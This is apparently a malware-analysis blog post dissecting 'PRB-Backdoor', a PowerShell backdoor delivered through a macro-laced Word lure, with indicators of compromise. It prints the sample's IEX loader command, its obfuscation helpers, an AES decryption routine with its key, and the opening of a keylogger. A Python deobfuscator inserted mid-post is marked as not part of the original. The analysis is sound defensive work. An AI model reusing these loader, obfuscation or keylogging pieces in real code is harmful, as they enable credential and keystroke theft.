# PRB-Backdoor - A Fully Loaded PowerShell Backdoor with Evil Intentions

sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html

Mo Bustami

## INTRODUCTION

[The great people at ClearSky](https://www.clearskysec.com/) reached out to me a couple of days ago regarding a sample that they suspected could be related to MuddyWater. They suspected so because the sample had some similarities with the way MuddyWater lures look and some similarities in the PowerShell obfuscation, specifically the character substitution routine.

[Figures: MuddyWater Sample; New Sample]

However, after analyzing the sample and investigating it further, I was able to show that this is indeed something different, but nonetheless interesting. This blog is a walk through my analysis and will highlight initial insights into this potential attack.

## THE SAMPLE - FROM AIRMILES TO MACRO CODE TO POWERSHELL

The sample that was shared with me is a macro-laced Word document called "Egyptairplus.doc" with an MD5 hash of fdb4b4520034be269a65cfaee555c52e. The macro code contains a function called Worker() which calls multiple other functions embedded in the document to ultimately run a PowerShell command (only the tail of the command is legible in the captured image):

```powershell
... $rt='';$Dt=geT-cOntEnt -patH $PTH -eNcoDInG aSCIi;FOrEach($I in $DT){iF ($I.Length -Gt 7700){$rt=$i.sPLIt('**')[2];BREak}};$rt=[syStEm.TExT.eNCODing]::asCII.gEtsTrIng([sysTEm.ConverT]::FROmbaSe64sTriNG($rT));IEX($RT);
```

This command looks for a chunk of data that is embedded in the actual document and begins with "**", then takes that code and Base64 decodes it. The result is a PowerShell script that looks like this:

```powershell
function main
{
$content="ZnVuY3Rpb24gejB3MnVQZVgoJHNLUHYpewogICAgJHNLUHYgPSAkc0tQdi5Ub0NoYXJBcnJheSgpCiAgICBbYXJyYXldOjpSZXZlcnN...
... Truncated code ...
...2ZhbHNlIiwgMCkp"
[string]$decode = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($content))
iex $decode
}
main
```

Replacing iex with Write-Output and running this code will result in a second-layer PowerShell script, shown earlier in the blog, that has similarities with MuddyWater code due to the use of the character substitution functions. Below is a snippet of the code:

```powershell
# Reverses a string: the helper used to hide reordered fragments
function z0w2uPeX($sKPv){
    $sKPv = $sKPv.ToCharArray()
    [array]::Reverse($sKPv)
    $G8JdH = -join($sKPv)
    return $G8JdH
}
# Expands placeholder tokens into newline, double quote, single quote, $ and backtick
function FQdZ7EqW($fpuD){
    $fpuD = $fpuD.Replace('#a#', "`n").Replace('#b#', '"').Replace('#c#', "'").Replace('#d#', "$").Replace('#e#', "``")
    return $fpuD
}
# Each statement is rebuilt with a -f format string whose indexes reorder the fragments
iex(FQdZ7EqW("{4}{5}{6}{1}{2}{0}{3}" -f (z0w2uPeX("1 sd")),"Se","con","0","S","tart-Slee",(z0w2uPeX("- p")), 0))   # Start-Sleep -Seconds 10
iex(FQdZ7EqW("{2}{1}{5}{0}{4}{3}" -f (z0w2uPeX(" yeWs60")),(z0w2uPeX("ob")),"[","e",(z0w2uPeX("urT#d# =")),"ol]#d#gS", 0))   # [bool]$gS06sWey = $True
```

Once you replace all the iex calls with Write-Output you will end up with more readable code, as shown below. This code still contains encoded chunks of data.
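As an added example, not code from the post or from the sample, here is a small Python deobfuscator that reimplements the two helpers above, z0w2uPeX (string reversal) and FQdZ7EqW (placeholder expansion), and resolves the `-f` format-string reordering so an analyst can recover each statement without executing the script. The regexes and the `deobfuscate_line` function are my own assumptions about the layout of the quoted lines; the SAMPLE text is a constructed input made of the two iex lines shown above.

```python
import re

# Constructed input: the two obfuscated iex(...) lines quoted in the post.
SAMPLE = r'''
iex(FQdZ7EqW("{4}{5}{6}{1}{2}{0}{3}" -f (z0w2uPeX("1 sd")),"Se","con","0","S","tart-Slee",(z0w2uPeX("- p")), 0))
iex(FQdZ7EqW("{2}{1}{5}{0}{4}{3}" -f (z0w2uPeX(" yeWs60")),(z0w2uPeX("ob")),"[","e",(z0w2uPeX("urT#d# =")),"ol]#d#gS", 0))
'''

# Placeholder tokens and the characters FQdZ7EqW expands them to.
PLACEHOLDERS = {"#a#": "\n", "#b#": '"', "#c#": "'", "#d#": "$", "#e#": "`"}

# Assumed statement shape: iex(FQdZ7EqW("<format>" -f <args>))
LINE_RE = re.compile(r'^iex\(FQdZ7EqW\("((?:\{\d+\})+)"\s+-f\s+(.*)\)\)$')
# One argument: a reversed literal, a plain literal, or a bare integer.
ARG_RE = re.compile(r'\(z0w2uPeX\("([^"]*)"\)\)|"([^"]*)"|(\d+)')


def z0w2uPeX(s):
    """Same behaviour as the sample's helper: reverse the string."""
    return s[::-1]


def FQdZ7EqW(s):
    """Same behaviour as the sample's helper: expand the #x# tokens."""
    for token, char in PLACEHOLDERS.items():
        s = s.replace(token, char)
    return s


def parse_args(arg_text):
    """Evaluate the -f argument list into plain strings."""
    args = []
    for m in ARG_RE.finditer(arg_text):
        value = m.group(m.lastindex)  # the one alternative that matched
        args.append(z0w2uPeX(value) if m.lastindex == 1 else value)
    return args


def deobfuscate_line(line):
    """Resolve one statement to the command it would hand to iex."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError("unexpected statement shape: %r" % line)
    fmt, arg_text = m.groups()
    args = parse_args(arg_text)
    # PowerShell's -f is .NET String.Format: {n} selects the n-th argument.
    assembled = re.sub(r"\{(\d+)\}", lambda g: args[int(g.group(1))], fmt)
    return FQdZ7EqW(assembled)


def deobfuscate(script):
    """Deobfuscate every non-empty line built from this pattern."""
    return [deobfuscate_line(ln) for ln in script.splitlines() if ln.strip()]


if __name__ == "__main__":
    for cmd in deobfuscate(SAMPLE):
        print(cmd)
```

Statements that do not follow this exact shape raise ValueError rather than being silently skipped, so a new layer of the sample is flagged instead of lost.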
Two interesting pieces are Invoker.ps1 and js.hta. The Invoker.ps1 script is used to decrypt the main backdoor code as shown below:

```powershell
$nxUHOcAE = "0ef4b1acb4394766" # This is the key used to decrypt the main backdoor code
$xWCWwEep = "{path}"
[string]$BJgVSQMa = Get-Content -Path $xWCWwEep -Force
# AES-128 (Rijndael, 128-bit block) in ECB mode with zero padding; the 16-byte key is the ASCII string above
$nl3hMTam = new-object system.security.cryptography.RijndaelManaged
$nl3hMTam.Mode = [System.Security.Cryptography.CipherMode]::ECB
$nl3hMTam.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$nl3hMTam.BlockSize = 128
$nl3hMTam.KeySize = 128
$nl3hMTam.Key = [System.Text.Encoding]::UTF8.GetBytes($nxUHOcAE)
# The file content is Base64, decoded before decryption; the padding bytes are trimmed as '*'
$W9NYYLlk = [System.Convert]::FromBase64String($BJgVSQMa)
$Oj5PebcQ = $nl3hMTam.CreateDecryptor();
$mL9fRirD = $Oj5PebcQ.TransformFinalBlock($W9NYYLlk, 0, $W9NYYLlk.Length);
[string]$Pru8pJC5 = [System.Text.Encoding]::UTF8.GetString($mL9fRirD).Trim('*')
Write-Output $Pru8pJC5 # I replaced iex with Write-Output
while($true){
    start-sleep -seconds 3
}
```

The encrypted backdoor code is passed through this script to be decrypted into the full-fledged backdoor code. I am sharing a snippet of the code here, as the full code of the backdoor is over 2000 lines when properly formatted. Notice the main function name PRB, hence the name I have given it: "PRB-Backdoor".

## POTENTIAL COMMAND & CONTROL

Running the sample in a sandbox did not show any network communication. However, during the analysis of the code I noticed early on a variable with the value `$hash.httpAddress ="http://outl00k[.]net"`. This looks like the main domain that the backdoor communicates with for all of its different functions.
Doing a Passive DNS and WHOIS lookup we can get additional information on the domain:

```
Domain Name: outl00k.net
Registrar WHOIS Server: whois.joker.com
Registrar URL: http://joker.com/
Updated Date: 2018-04-25T03:32:22Z
Creation Date: 2018-01-01T11:35:58Z
Registrant Name: Simon Nitoo
Registrant Street: Tehran
Registrant City: Tehran
Registrant State/Province: Tehran
Registrant Postal Code: 231423465
Registrant Country: IR
Registrant Phone: +98.2189763584
Registrant Email: simon.nitoo@chmail.ir
Registry Admin ID:
Admin Name: Simon Nitoo
Admin Street: Tehran
Admin City: Tehran
Admin State/Province: Tehran
Admin Postal Code: 231423465
Admin Country: IR
Admin Phone: +98.2189763584
Admin Email: simon.nitoo@chmail.ir
Registry Tech ID:
Tech Name: Simon Nitoo
Tech Street: Tehran
Tech City: Tehran
Tech State/Province: Tehran
Tech Postal Code: 231423465
Tech Country: IR
Tech Phone: +98.2189763584
Tech Email: simon.nitoo@chmail.ir
Name Server: ns1.outl00k.net
Name Server: ns2.outl00k.net
```

The registrant email address is also used for another domain, LinLedin[.]net. Both domains are currently resolving to the following IP addresses:

- outl00k[.]net - 74.91.19[.]118 up until May 10, 2018
- LinLedin[.]net - 5.160.124[.]99 on April 30, 2018

As of the writing of this blog, there doesn't seem to be much information about either of those domains.

## PRB-BACKDOOR FUNCTIONALITY - AN EARLY LOOK

I am yet to go through the whole code of the backdoor; however, below is an initial look into its functionality based on initial analysis.

The backdoor has the following functions:

- **PRB-CREATEALIVE and PRB-CREATEINTRODUCE** - those two functions seem to be related to initial communication and registration with the C&C
- **PRB-HISTORY** is a function that looks to grab the browsing history from different browsers including Chrome, IE and Firefox. It utilizes a sub-function called GET-HISTORY
- **PRB-PASSWORD**
- **PRB-WRITEFILE**
- **PRB-READFILE**
- **PRB-FUNCTUPDATE**
- **PRB-SHELL**
- **PRB-LOGGER**
- **SNAP** - takes a screenshot of the screen
- **sysinfo** - gets the system info

And many more functions. At some point in the code there are even what seem to be .NET/C# code snippets:

```powershell
# C# source embedded in a PowerShell here-string; WH_KEYBOARD_LL (13) is the Windows low-level keyboard hook identifier
$dsc = @"
using System;
using System.IO;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
using System.Text;
namespace dDumper
{
    public static class Program
    {
        private const int WH_KEYBOARD_LL = 13;
        private const int WM_KEYDOWN = 0x0100;
        private const int WM_SYSTEMKEYDOWN = 0x0104;
        private const int WM_KEYUP = 0x0101;
        private const int WM_SYSTEMKEYUP = 0x0105;
```

## FINAL THOUGHTS

The PRB-Backdoor seems to be a very interesting piece of malware that is designed to run on the victim machine and gather information, steal passwords, log keystrokes and perform many other functions. I could not find any reference to the backdoor or its code in any public source. I would imagine there are other lures and samples out there, and hopefully other researchers will be able to dive deeper into the code and reveal additional details. I will do so as soon as I have additional time, but I thought it would be beneficial to share these initial findings in the hope of shedding some light on this activity.

## INDICATORS OF COMPROMISE

- fdb4b4520034be269a65cfaee555c52e (MD5 of Egyptairplus.doc)
- outl00k[.]net
- LinLedin[.]net
- 74.91.19[.]118
- 5.160.124[.]99